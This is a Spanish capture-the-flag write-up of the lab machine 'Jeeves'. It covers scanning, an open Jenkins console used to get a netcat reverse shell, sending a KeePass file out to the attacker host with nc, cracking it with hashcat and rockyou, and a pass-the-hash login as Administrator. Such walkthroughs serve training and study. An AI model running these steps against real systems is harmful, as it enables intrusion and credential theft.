Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins.

Nmap scan report for 10.10.10.63
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT  	STATE SERVICE  	VERSION
80/tcp	open  http     	Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Ask Jeeves
135/tcp   open  msrpc    	Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http     	Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_	Message signing enabled but not required
| smb2-time:
|   date: 2019-10-20 01:23:12
|_  start_date: 2019-10-20 01:21:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.72 seconds

Si usamos el dirbuster en 50000 vemos el folder askjeeves

Si entras es un administrador de Jenkins
desde ahi se puede ejecutar windows creando un proyecto. Vamos a bajar NC y llamar de vuelta.

root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\kohsuke\Desktop>more user.txt
more user.txt
e3232272596fb47950d

Para ser admin tienes que encontrar el archivo CEH.kdbx (keeppass)

Lo transferimos de windows a linux con:

C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx
nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx

Lo recibimos con:

root@Kali2:~/Downloads# nc -lp 1235 >jeeves.kdbx

Extraemos el hash con John

root@Kali2:~/Downloads# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Copiamos todo menos “CEH:” a un archivo nuevo y lo crakeamos usando hashcat y rockyou

root@Kali2:~/Desktop# hashcat -m 13400 hashcatjeeves /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Running
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Sat Oct 19 21:15:25 2019 (38 secs)
Time.Estimated...: Sun Oct 20 03:02:58 2019 (5 hours, 46 mins)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  	688 H/s (15.90ms) @ Accel:256 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 25600/14344385 (0.18%)
Rejected.........: 0/25600 (0.00%)
Restore.Point....: 25600/14344385 (0.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5504-5568
Candidates.#1....: joey1 -> 220292

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1

Si usamos keepass2 podemos extrar el NLTM y passar el hash

root@Kali2:~/Desktop# pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
jeeves\administrator

Y listo, espero que no estén así de difíciles los de OSCP ja. Pero bueno ya tengo otra box.